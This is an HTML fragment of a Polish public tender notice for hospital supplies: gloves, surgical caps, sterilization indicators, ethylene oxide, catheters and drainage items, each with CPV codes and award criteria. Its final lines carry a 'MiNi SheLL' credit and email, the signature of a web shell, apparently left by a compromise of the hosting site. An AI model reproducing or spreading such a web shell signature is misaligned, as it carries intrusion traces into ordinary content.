</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rękawice foliowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice foliowe. Pakowane po 100 szt. Rozmiar S, M, L (w zależności od potrzeb zamawiającego). - 50 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Rękawice diagnostczne z lateksu, niejałowe, bezpudrowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice diagnostyczne, z lateksu, niejałowe, pasujące na obie dłonie. Zawartość protein  <35?g/g. Poziom AQL = 1,5. O grubości w części palca min. 0,13 i długości min. 240 mm. Mankiet zakończony równomiernie rolowanym rantem, teksturowane na całej powierzchni. Spełnianie wymagań potwierdzone protokołami badań producenta nie starszymi niż z 2013 roku. Fabrycznie oznakowane jako wyrób medyczny i środek ochrony osobistej kat. III. Pakowane po 100 szt. Rozmiar XS, S, M, L, XL (w zależności od potrzeb zamawiającego). - 7 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Rękawice nitrylowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice diagnostyczne wykonane z nitrylu, bezpudrowe, z wewnętrzna  warstwą polimerową, mankiet rolowany, w kolorze niebieskim. Lekko teksturowane z dodatkową teksturą na końcach palców, grubość rękawic w palcach  min. 0,10 mm, na dłoni min. 0,07mm. Zgodne z PN/EN 455-1, 2, 3,4, potwierdzone przez raport z badań producenta. Rękawice odporne na przenikanie związków chemicznych wg PN EN 374 potwierdzone przez niezależne badania przynajmniej 4 związków chemicznych (kwasy organiczne, nieorganiczne, zasady,aldehydy i alkohole w tym izopropanol 70% z czasem przenikania min.30 minut). Rękawice odporne na przenikanie wirusów potwierdzone protokołem badań wydanym przez jednostkę niezależną. Zarejestrowane jako wyrób medyczny oraz środek ochrony indywidualnej kat. III. Fabrycznie oznakowane jako wyrób medyczny i środek ochrony osobistej kat. III. Pakowane po 100 szt. Rozmiar XS, S, M, L, XL (w zależności od potrzeb zamawiającego). - 250 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Rękawice chirurgiczne, z lateksu, sterylne, pudrowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice  chirurgiczne , lateksowe , sterylne , pudrowane , zgodne z normą EN 455-1,2,3: niska zawartośc pudru , poziom protein latekosowych <_70 mcg /g , kształt w pełni anatomiczny ( przeciwstawny kciuk, zgięte palce): rolowany mankiet n, oznakowanie CE, oporne na rozerwanie ,łatwe w nakładaniu, dobrze dopasowane , powierzchnia mikroporowata ,oporne na przenikanie  wirusów ( potwierdzone badaniami zgodnie z normą ASTMF 1671) , oraz oporne na przenikanie związków chemicznych  wg PN EN 374 . minimalna długośc  rękawicy 280 mm .Pakowane w  opakowania  folia - folia . Sterylizowane radiacyjnie. , pakowane parami , oznakowanie  opakowania  jednostkowego i zbiorczego nazwa pełna rękawic , rodzaj rozmiar , data produkcji /seria, data przydatności do użytku, nazwa producenta. Pakowane po 50 par. Rozmiar 6,0 6,5 7,0 7,5 8,0 8,5 9,0 (w zależności od potrzeb zamawiającego). - 20 000 par..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Rękawice chirurgiczne, z lateksu, sterylne, bezpudrowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice  chirurgiczne , lateksowe , sterylne , bezpudrowe  , obustronnie polimeryzowane    poziom  protein  lateksowych <_  30 mcg /g , o  anatomicznym  ksztłcie  mankiet rolowany , mikroteksturowane , o wartości  finałowego uwalniania AQL 1,0 , zgodnie z normą  EN 4551,2,3 4 posiadające  badania na  przenikanie   wirusów zgodnie z normą ASTMF 1671 , oraz oporne na przenikanie związków chemicznych  wg PN EN 374 . minimalna długośc  rękawicy 295 mm .Pakowane w  opakowania  folia - folia . Sterylizowane radiacyjnie. , pakowane parami , oznakowanie  opakowania  jednostkowego i zbiorczego nazwa pełna rękawic , rodzaj rozmiar , data produkcji /seria, data przydatności do użytku, nazwa producenta. Pakowane po 50 par. Rozmiar 6,0 6,5 7,0 7,5 8,0 8,5 9,0 (w zależności od potrzeb zamawiającego). - 11 000 par..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Rękawice chirurgiczne, z lateksu, sterylne, niepudrowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice chirurgiczne , ortopedyczne , sterylne , niepudrowane , lateksowe, pokryte polimerem , z rolkowanym mankietem o grubszych ściankach, w komplecie  o zróżnicowanej kolorystyce o grubosciach : rękawica wewnętrzna : palec 0,17-0,18 mm, dłoń 0,16-0,18 mmi rękawica zewnętrzna : palec 0,24-0,26mm, dłoń 0,22-0,23 mm, zgodnie z normą EN455 na wirusy ASTMF 1671. Spełnianie wymagań potwierdzone protokółami badań producenta. Pakowane po 50 par. Rozmiar 7,5 8,0 8,5
(w zależności od potrzeb zamawiającego). - 850 par..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Rękawice chirurgiczne, lateksowe, ginekologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice chirurgiczne ,, sterylne ,lateksowe z przedłużonym mankietem , o długości min. 500 mm, położniczo- ginekologiczne, bezpudrowe, wskażnik  AQL 1,5 zgodnie z norma EN455 1+2+3, koniec zrolowany, przylegające do ręki , mikroporowata powierzchnia dłoni, z poziomem  protein <10 mcg/g. Pakowane po 50 par. Rozmiar 6,5 7,5 8,5 (w zależności od potrzeb zamawiającego). - 50 par..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Odzież medyczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czepki chirurgiczne - 4 pozycje:
1) Okrągły czepek chirurgiczny (typu beret), wykonany z lekkiej przewiewnej włókniny 25g/m2, ściągnięty lekko gumką, sposób pakowania czepków gwarantujący  higieniczne przechowywanie i wyjmowanie. - 7 000 szt.
2) Czepek chirurgiczny męski, krój furażerki, włókninowy 25g/m2, wykonany w części bocznej z podwójnej włókniny pochłaniającej pot, zaś w części górnej z włókniny perforowanej (siateczki), z tyłu ściągniętej gumką (nie uciskającą). Kolor dowolny (oprócz białego), sposób pakowania czepków  gwarantujący  higieniczne przechowywanie i wyjmowanie. - 500 szt.
3) Czepek chirurgiczny damski o kroju furażerki, włókninowy 25g/m2, z tyłu wiązany na troki, z taśmą o szerokości 5-6 cm pochłaniającą pot nad czołem, zaś w części górnej z włókniny perforowanej, kolor dowolny (oprócz białego). Sposób pakowania czepków gwarantujący higieniczne przechowywanie i wyjmowanie. - 5 000 szt.
4) Czepek chirurgiczny wiązany z tyłu na troki z włókniny wiskozowej 25g/m2, głęboki. Sposób pakowania czepków  gwarantujący  higieniczne przechowywanie i wyjmowanie. - 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zestawy diagnostyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wskaźniki i testy - 9 pozycji:
1) Nietoksyczny wskaźnik do sterylizacji parą wodną o wartościach ustalonych (UW) 121°C/20 min i 134°C/7 min odpowiadający klasie 6 wg ISO 11140-1. - 2 000 szt.
2) Nietoksyczny wieloparametrowy wskaźnik do sterylizacji parą wodną spełniający wymogi kl. 4 wg  ISO 11140-1. 15 000 szt.
3) Test biologiczny do sterylizacji parą wodną-fiolkowy do szybkiego odczytu w ciągu 3-5 godz. , 10 do pot. 6. - 800 szt.
4) Test biologiczny do sterylizacji 100% tlenkiem etylenu-fiolkowy. Wymagane przedstawienie przykładowego atestu serii oferowanego wskaźnika. - 200 szt.
5) Nietoksyczny wskaźnik zintegrowany spełniający wymogi kl. 5 wg ISO 11140-1 do sterylizacji 100% tlenkiem etylenu. - 200 szt.
6) Nietoksyczny wieloparametrowy wskaźnik dla sterylizacji 100% tlenkiem etylenu kl. 4 ISO 11140-1. - 1 000 szt.
7) Testy sprawdzające skuteczność procesów mycia oraz efektywność działania detergentów w myjniach-dezynfektorach zgodnie z ISO15883. Substancja wskaźnikowa koloru czerwonego, umieszczona na metalowej cienkiej płytce nadającej się do archiwizacji. - 500 szt.
8) Taśma samoprzylepna ze wskaźnikiem sterylizacji para wodna o wymiarze  25 mm. - 1 500 szt.
9) Taśma samoprzylepna bez wskaźnika do zamykania pakietów o wymiarze  25 mm. - 5 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.25-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Tlenek etylenu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Gaz - tlenek etylenu 100% 134g. - 150 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.32.63.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Kompresy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kompresy włókninowe   30 G  jałowe. Rozmiar 5 cm x 5 cm. - 350 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.19-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Materiały medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cewniki, zgłębniki, kanki - 5 pozycji:
1) Cewnik Nelaton romiar  od 6 F do 22F (w rozmiar  zależności od potrzeb Zamawiającego), wykonany z elastycznego PCV  bez ftalanów.Barwny kod nasadek.Gładko zakończony, dł.400 mm z  powierzchnią zmrożoną.Sterylny *. - 420 szt.
2) Cewnik Foleya urologiczny 18 F  dwudrożny z balonen (5-15 ml), wykonany z lateksu pokrytego warstwa silikonu z zastawką lateksową, z końcówka kodowana kolorem. Sterylny. - 820 szt. 
3) Zgłębnik żołądkowy 20 F dł mim 800-1250 mm  wykonany z PCV wolnego od ftalanow , odpornego na złamania i skręcania się ( o powierzchni uniemożliwiającej  przyklejanie się do błon śluzowych), dwa  otwory  boczne , bez otworu centralnego, cyfrowa podziałka głębokości , konektory zgłębnika wyposażone we  wkładki redukcyjne. Luer oraz  zatyczki. Barwny kod nasadek. Sterylny , pakowany folia-papier, pojedyńczo. - 200 szt.
4) Zgłębnik żołądkowy 32 F dł mim 800-1250 mm  wykonany z PCV wolnego od ftalanow , odpornego na złamania i skręcania się ( o powierzchni uniemożliwiającej  przyklejanie się do błon śluzowych), dwa  otwory  boczne , bez otworu centralnego, cyfrowa podziałka głębokości , konektory zgłębnika wyposażone we  wkładki redukcyjne. Luer oraz  zatyczki. Barwny kod nasadek. Sterylny , pakowany folia-papier, pojedyńczo. - 120 szt.
5) Kanka do odbytnicy 8 x 250 jednorazowego użytku. Sterylna *. - 250 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Jednorazowe, niechemiczne artykuły medyczne i hematologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylne pojemniki do odsysania ran pooperacyjnych, typu Bellows, o pojemności 500 ml., z wewnętrzną sprężyną umożliwiającą wytwarzanie podciśnienia o 100 mm/Hg, z zaworem jednokierunkowym, z drenem łączącym, pakowane pojedynczo w rękaw papierowo-foliowy. Opatrzone informacją   (na zewnętrz opakowania zbiorczego i jednostkowego) o produkcie medycznym(nazwa, parametry, numer referencyjny, LOT, data przydatności nie krótsza niż rok, metoda wyjałowienia). - 150 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Maski tlenowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nebulizator typu cirrus (osadzanie w tchawicy i oskrzelach) dla dorosłych o pojemności 10 ml do układów oddechowych 22mm z rurką T i drenem o przekroju gwiazdkowym (niezałamującym się) o długości 180 cm . Sterylny. - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.71.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Jednorazowe, niechemiczne artykuły medyczne i hematologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rurki nosowo- gardłowe rozmiar od  6, 0  do 8,0  wykonane z przezroczystego,miękkiego i delikatnego PVC medycznego wolne do lateksu..Sterylne Rozmiar w zależności od potrzeb Zamawiającego. - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Wyroby do transfuzji krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyroby do transfuzji krwi - 6 pozycji:
1) Filtr krwi kaskadowy, trójstopniowy,: 175, 40, 10 mikronów; połączenie typu Spike z możliwością podłączenia do kaniuli obwodowej, sterylny. - 140 szt.
2) Niskociśnieniowy mieszek o pojemności 125 ml do drenażu ran, harmonijkowy kształt z otworem na kciuk umożliwiający wygodna obsługę jedną ręką z łącznikiem Y i zastawką antyzwrotną wraz z workiem o pojemności 700 ml do gromadzenia krwi z wbudowanym filtrem 200 mikronów, portem iniekcyjnym zabezpieczonym pokrywą; oraz dwa efektywne dreny spiralne z trokami CH 14, sterylny. - 140 szt.
3) Dodatkowy worek o pojemności 700 ml do gromadzenia krwi z wbudowanym filtrem 200 mikronów, portem iniekcyjnym zabezpieczony pokrywą, sterylny. - 100 szt.
4) Worek do dalszego drenażu pooperacyjnego o pojemności 700 ml z zastawką antyzwrotną z poprzecznym podwieszanym kranikiem spustowym i połączeniem Luer-Lock zapewniający nieograniczony przepływ, sterylny. - 140 szt.
5) Końcówka do odsysania z dwoma filtrami, trzema końcówkami wymiennymi i drenem, sterylna. - 100 szt.
6) Fiksator do stabilizacji drenów podskórnych z warstwą hydrokolidową, wykonanych z miekkiej  pianki, bez plastikowych elementów. - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.42.20-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com